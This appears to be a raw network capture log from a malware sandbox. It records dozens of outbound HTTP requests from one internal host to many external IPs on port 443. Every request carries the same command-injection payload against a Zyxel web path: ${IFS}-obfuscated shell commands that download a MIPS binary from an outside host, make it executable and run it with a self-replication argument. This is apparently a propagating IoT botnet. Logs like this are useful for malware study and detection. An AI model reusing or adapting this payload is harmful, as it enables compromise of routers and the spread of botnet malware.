                                    Jan 13, 2024 19:02:53.643264055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9325192.168.2.1344496138.194.131.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643326044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9326192.168.2.1335442195.99.148.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643383980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9327192.168.2.135117462.40.246.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643434048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9328192.168.2.1359820135.86.62.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643507004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9329192.168.2.1344702112.244.221.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643584013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9330192.168.2.134714089.75.144.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643613100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9331192.168.2.134788670.78.91.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643686056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9332192.168.2.1337072206.93.97.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643738031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9333192.168.2.1336704213.249.218.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643789053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9334192.168.2.1337942216.128.67.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643855095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9335192.168.2.1334868128.141.208.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643927097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9336192.168.2.1343594188.172.198.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.643981934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9337192.168.2.134345449.176.144.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644057035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9338192.168.2.136001823.224.90.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644123077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9339192.168.2.1343984220.124.26.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644186020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9340192.168.2.1354764129.55.204.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644256115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9341192.168.2.135371078.127.127.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644310951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9342192.168.2.13489145.76.141.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644355059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9343192.168.2.134041873.47.74.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644398928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9344192.168.2.1335958198.8.69.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644457102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9345192.168.2.135380444.249.165.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644506931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9346192.168.2.1332932131.43.218.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644567966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9347192.168.2.1357988207.68.37.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644599915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9348192.168.2.135158051.91.225.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644685030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9349192.168.2.135855662.28.173.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644740105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9350192.168.2.134924258.41.55.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644788980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9351192.168.2.135865081.45.131.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644820929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9352192.168.2.134464887.83.102.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644896030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9353192.168.2.1334060201.127.120.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644923925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9354192.168.2.133576664.180.0.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.644988060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9355192.168.2.134536071.6.237.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645024061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9356192.168.2.1341458114.169.129.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645106077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9357192.168.2.135176250.233.102.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645149946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9358192.168.2.135591838.22.244.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645216942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9359192.168.2.1342792106.42.237.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645282984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9360192.168.2.1358178209.191.155.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645334005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9361192.168.2.1343574221.34.222.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645380020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9362192.168.2.1354392116.165.64.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645452976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9363192.168.2.133885889.206.145.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645503998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9364192.168.2.1358576112.185.51.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645559072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9365192.168.2.1335712151.131.146.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645617962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9366192.168.2.133323636.181.73.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645665884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9367192.168.2.135790057.205.218.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645729065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9368192.168.2.1337030145.215.134.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645795107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9369192.168.2.1345122195.212.169.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645832062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9370192.168.2.135602099.90.231.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645905972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9371192.168.2.135363224.172.240.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.645978928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9372192.168.2.135923099.144.167.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646014929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9373192.168.2.1336062192.52.113.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646065950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9374192.168.2.1337958126.89.114.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646110058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9375192.168.2.1341120132.72.25.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646164894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9376192.168.2.1336842159.53.131.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646236897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9377192.168.2.1348138126.217.70.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646300077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9378192.168.2.1343126183.173.188.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646362066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9379192.168.2.135265492.13.143.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646392107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9380192.168.2.134939858.135.107.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646423101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9381192.168.2.134232085.22.17.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646464109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9382192.168.2.135496634.214.108.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646541119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9383192.168.2.135262278.128.182.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646574020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9384192.168.2.135885498.121.243.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646651983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9385192.168.2.135169261.182.104.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646698952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9386192.168.2.1354668160.23.57.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646724939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9387192.168.2.134767678.182.65.58443
                                    TimestampBytes transferredDirectionData
